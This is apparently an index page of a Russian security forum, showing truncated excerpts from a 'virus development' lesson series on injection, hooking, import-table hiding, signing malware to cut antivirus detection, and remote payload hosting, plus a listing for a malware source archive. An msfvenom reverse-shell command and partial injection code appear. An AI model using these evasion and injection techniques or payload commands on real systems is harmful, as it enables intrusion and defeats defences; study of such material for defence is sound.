-
Обратная связь: [email protected]
Наш канал в telegram: https://t.me/ru_sfera
Группа VK: https://vk.com/rusfera
Пользователи могут писать на форуме ТОЛЬКО ЧЕРЕЗ 7 ДНЕЙ после регистрации
Ру-Сфера: Исследование защиты и обсуждение IT-безопасности
Уроки Разработка вирусов-28. Предельная техника. Разборка с сисколами
Что такое системные вызовы (Syscalls)
Системные вызовы Windows или syscalls служат интерфейсом для взаимодействия программ с системой, позволяя им запрашивать определенные услуги, такие как чтение или запись в файл, создание нового процесса или выделение памяти.
Помните из вводных модулей, что syscalls - это API, которые выполняют действия, когда вызывается функция WinAPI. Например, системный вызов NtAllocateVirtualMemory активируется при вызове функций WinAPI VirtualAlloc или VirtualAllocEx. Затем этот системный вызов перемещает параметры, предоставленные пользователем в предыдущем вызове функции, в ядро Windows, выполняет запрошенное действие и возвращает результат программе.
Все системные вызовы возвращают значение NTSTATUS, которое указывает код ошибки. STATUS_SUCCESS (ноль) возвращается, если системный вызов успешно выполняет операцию.
Большинство системных вызовов не документированы Microsoft, поэтому...
Уроки Разработка вирусов-27.Кунгфу-2.Изучаем API Hooking
Введение
API Hooking — это техника, используемая для перехвата и изменения поведения функции API. Она часто используется для отладки, обратного проектирования и взлома игр.
API Hooking позволяет заменять оригинальную реализацию функции API собственной версией, которая выполняет некоторые дополнительные действия до или после вызова оригинальной функции. Это позволяет изменять поведение программы без изменения её исходного кода.
Трамплины
Классический способ реализации API-хуков осуществляется с помощью трамплинов.
Трамплин — это шеллкод, который используется для изменения пути выполнения кода путем перехода на другой конкретный адрес в адресном пространстве процесса. Шеллкод трамплина вставляется в начало функции, в результате чего функция становится "подцепленной". Когда вызывается подцепленная функция, вместо нее активируется шеллкод трамплина, и поток выполнения передается и изменяется на другой адрес, что приводит к...
Уроки Разработка вирусов-26. Изучаем кунгфу-1. Скрытие таблицы импорта
Таблица импортных адресов (IAT) содержит информацию о файле PE, такую как используемые функции и DLL, экспортирующие их. Этот тип информации может быть использован для создания сигнатуры и обнаружения двоичного кода.
Например, изображение ниже показывает таблицу импортных адресов примера инъекции шелл-кода.
Файл PE импортирует функции, которые считаются высоко подозрительными. Решения безопасности могут затем использовать эту информацию для детекта.
Сокрытие и обфускация IAT - Метод 1
Чтобы скрыть функции от IAT, можно использовать GetProcAddress, GetModuleHandle или LoadLibrary для динамической загрузки этих функций во время выполнения. Приведенный ниже фрагмент загрузит VirtualAllocEx динамически, и поэтому он не появится в IAT при проверке.
C:
typedef LPVOID (WINAPI* fnVirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD...ВАЖНО Огромная база исходников современных вирусов для разных платформ
Весь исходный код, который упакован, может быть или не быть установлен с паролем 'infected' (без кавычек). Отдельные файлы, вероятно, не упакованы.
Структура каталогов:
- Android
- Generic Android OS malware, some leaks and proof-of-concepts
- Engines
- BAT
- Linux
- VBS
- Win32
- Java
- Some java infectors, proof-of-concept ransomware
- Javascript
- In-browser malware
- Legacy Windows
- Win2k
- Win32
- Win95
- Win98
- Win9x
- WinCE
- Libs (libraries)
- Bootkits
- DDoS proof-of-concepts
- Win32 libraries (disassemblers, etc).
- Linux
- Backdoors
- Botnets
- Infectors
- Mirai-Family (related and/or spin-offs)
- Rootkits
- Tools
- Trojans
- MSDOS
- MSIL
- MacOS
- Other
- Acad malware
- FreeBSD malware
- SunOS malware
- Symbian OS malware
- Discord-specific malware
- PHP
- ...
Уроки Разработка вирусов-23. Контроль выполнения полезной нагрузки
В реальных сценариях важно ограничивать действия, выполняемые вредоносным ПО, и концентрироваться на основных задачах.
Чем больше действий выполняет вредоносное ПО, тем вероятнее, что его обнаружат системы мониторинга.
Вот например такая ситуация, как в этом уроке, правилом хорошего тона перед перезаписью атакуемой функции, необходимо сохранить оригинал, а потом после выполнения полезной нагрузки восстановить функцию.
Но для этого нужно знать, что полезная нагрузка выполнилась.)
Объекты синхронизации Windows могут быть использованы для управления выполнением полезной нагрузки. Эти объекты координируют доступ к общим ресурсам для нескольких потоков или процессов, обеспечивая контролируемый доступ к общим ресурсам и предотвращая конфликты или состояния гонки, когда несколько потоков или процессов пытаются одновременно...
Уроки Разработка вирусов-22.Изучаем технику Stomping Injection
Предыдущая статья показывала как запустить peyload и при этом избежать использования вызовов WinAPI VirtualAlloc/Ex.
Этот-же урок демонстрирует другой метод, который избегает использования этих WinAPI.
Термин "stomping" относится к действию перезаписи или замены памяти функции или другой структуры данных в программе другими данными.
"Function stomping" - это техника, при которой байты исходной функции заменяются новым кодом, в результате чего функция заменяется или больше не работает так, как предполагалось. Вместо этого функция будет выполнять другую логику. Для реализации этого требуется адрес жертвенной функции для "stomping".
Выбор целевой функции
Получение адреса функции, если она локальная, то это не сложно, но основной вопрос при этой технике - какая функция получается.
Перезапись часто используемой функции может...
Уроки Разработка вирусов-21.Инъекция отображаемой памяти
Локальная инъекция отображаемой памяти
Введение
До сих пор во всех предыдущих реализациях использовался тип локальной памяти для хранения полезной нагрузки во время выполнения. Локальная память выделяется с использованием VirtualAlloc или VirtualAllocEx.На следующем изображении показана выделенная локальная память в реализации "LocalThreadHijacking", содержащей полезную нагрузку.
Отображаемая память
Процесс выделения локальной памяти тщательно отслеживается средствами безопасности из-за его широкого использования вредоносным программам.Чтобы избежать таких часто контролируемых WinAPI, таких-как VirtualAlloc/Ex и VirtualProtect/Ex, инъекция отображаемой памяти использует тип отображаемой памяти с использованием различных WinAPI, таких как CreateFileMapping и MapViewOfFile.
Также стоит отметить, что WinAPI VirtualProtect/Ex не может использоваться...
Уроки Разработка вирусов-20.Вызов кода через функции обратного вызова
Введение
Функции обратного вызова используются для обработки событий или выполнения действия, когда выполняется определенное условие. Они применяются в различных сценариях в операционной системе Windows, включая обработку событий, управление окнами и многопоточность.
Определение функции обратного вызова от Microsoft следующее:
Функция обратного вызова - это код в управляемом приложении, который помогает функции неконтролируемой DLL завершить задачу. Вызовы функции обратного вызова передаются косвенно из управляемого приложения через функцию DLL и обратно к управляемой реализации.
Некоторые обычные API Windows имеют возможность выполнять полезные нагрузки с помощью обратных вызовов. Их использование предоставляет преимущества перед решениями безопасности, так как эти функции могут казаться безвредными и потенциально уклоняться от некоторых решений по безопасности.
Злоупотребление функциями обратного...
Уроки Разработка вирусов-17.Изучаем технику Thread Hijacking
Thread Hijacking (Похищение потока) - это техника, позволяющая выполнять полезную нагрузку без создания нового потока. Этот метод работает путем приостановки потока и обновления регистра адреса команды, указывающего на следующую инструкцию в памяти, чтобы он указывал на начало полезной нагрузки. Когда поток возобновляет выполнение, выполняется полезная нагрузка.
В этой статье будем использовать Msfvenom TCP reverse shell payload, а не полезную нагрузку calc., потому что она сохраняет поток после выполнения, тогда как полезная нагрузка calc завершила бы поток после выполнения.
Тем не менее, обе полезные нагрузки работают, но сохранение потока после выполнения позволяет проводить дальнейший анализ.
Контекст Потока
Прежде чем можно объяснить эту технику, необходимо понять что такое контекст потока. У каждого потока есть приоритет планирования и он содержит ряд структур, которые система сохраняет...
Уроки Разработка вирусов-16.Разборка с цифровой подписью зверька
Когда пользователь пытается загрузить исполняемый файл из интернета, он часто подписан компанией как способ доказать пользователю, что это надежный исполняемый файл.
Несмотря на то что системы безопасности все равно будут проверять исполняемый файл, на него была бы направлена дополнительная проверка, если бы бинарный файл не был подписан.
Предлагаю рассмотреть шаги, необходимые для подписания вредоносного бинарного файла, что может повысить его надежность.
В статье демонстрируется подписание бинарного файла на исполняемом файле, созданном через Msfvenom: msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o mybin.exe
Тест, как подпись влияет на детект:
Перед началом бинарный файл был загружен на VirusTotal, чтобы увидеть степень обнаружения до подписания бинарного файла.
Степень обнаружения довольно высока: 52 из 71 антивирусов отметили файл как вредоносный...
Уроки Разработка малвари-14. Размещаем Payload удаленно на сервере
На протяжении всех статей до сих пор payload был постоянно хранящимся непосредственно внутри бинарного файла.
Это быстрый и часто используемый метод для извлечения payload. К сожалению, в некоторых случаях, когда существуют ограничения по размеру payload, сохранение payload внутри кода не является осуществимым подходом. Альтернативный подход заключается в размещении payload на веб-сервере и его извлечении во время выполнения.
Настройка Веб-сервера
Эта статья требует веб-сервера для размещения файла payload. Самый простой способ - использовать HTTP-сервер Python с помощью следующей команды:
Обратите внимание, что файл payload должен быть размещен в той же директории, где выполняется эта команда.
Чтобы проверить работу веб-сервера, перейдите по адресу с использованием браузера.
[ATTACH type="full"...
Это быстрый и часто используемый метод для извлечения payload. К сожалению, в некоторых случаях, когда существуют ограничения по размеру payload, сохранение payload внутри кода не является осуществимым подходом. Альтернативный подход заключается в размещении payload на веб-сервере и его извлечении во время выполнения.
Настройка Веб-сервера
Эта статья требует веб-сервера для размещения файла payload. Самый простой способ - использовать HTTP-сервер Python с помощью следующей команды:
Код:
python -m http.server 8000Обратите внимание, что файл payload должен быть размещен в той же директории, где выполняется эта команда.
Чтобы проверить работу веб-сервера, перейдите по адресу с использованием браузера.
[ATTACH type="full"...
Уроки Разработка малвари-13.Инъекция шелл-кода в процесс
Эта статья похожа на предыдущую DLL Injection с небольшими изменениями.
Инъекция shellcode в процесс будет использовать практически те же самые API Windows.
VirtualAllocEx - выделение памяти.
WriteProcessMemory - запись полезной нагрузки в удаленный процесс.
VirtualProtectEx - изменение защиты памяти.
CreateRemoteThread - выполнение полезной нагрузки через новый поток.
Перечисление процессов
Как и в предыдущей статье, инъекция процесса начинается с перечисления процессов.
Фрагмент кода для перечисления процессов, показанный ниже, уже был объяснен в предыдущей статье.
C:
BOOL GetRemoteProcessHandle(LPWSTR szProcessName, DWORD* dwProcessId, HANDLE* hProcess) {
// Согласно документации:
// Перед вызовом функции Process32First установите член dwSize в sizeof(PROCESSENTRY32).
// Если dwSize не инициализирован...Уроки Разработка малвари-11. Локальный запуск Payload
Предлагаю в этой статье исследовать использование динамических библиотек (DLL) в качестве полезной нагрузки и попробовать загрузить вредоносный файл DLL в текущем процессе.
Создание DLL
Создание DLL просто и может быть выполнено с помощью Visual Studio.
Создайте новый проект, выберите язык программирования C++, а затем выберите Динамически-связанную библиотеку (DLL).
Это создаст код-скелет DLL, который будет изменяться в этой статье.
Если вы хотите освежить свои знания о том, как работают DLL, то можете обратится к этой статье:Уроки - Разработка малвари - 5. Изучаем динамические библиотеки
В этой статье будет использовано диалоговое окно, которое появляется, когда DLL успешно загружена.
Создание диалогового окна можно легко сделать с помощью MessageBox из WinAPI.
Приведенный ниже фрагмент кода будет запускать...
Создание DLL
Создание DLL просто и может быть выполнено с помощью Visual Studio.
Создайте новый проект, выберите язык программирования C++, а затем выберите Динамически-связанную библиотеку (DLL).
Это создаст код-скелет DLL, который будет изменяться в этой статье.
Если вы хотите освежить свои знания о том, как работают DLL, то можете обратится к этой статье:Уроки - Разработка малвари - 5. Изучаем динамические библиотеки
В этой статье будет использовано диалоговое окно, которое появляется, когда DLL успешно загружена.
Создание диалогового окна можно легко сделать с помощью MessageBox из WinAPI.
Приведенный ниже фрагмент кода будет запускать...
Поиск по форуму
Последние сообщения
-
-
-
ВАЖНО Miner Search - Поиск и уничтожение скрытых майнеров- Последнее: Spectrum735
-
-
-
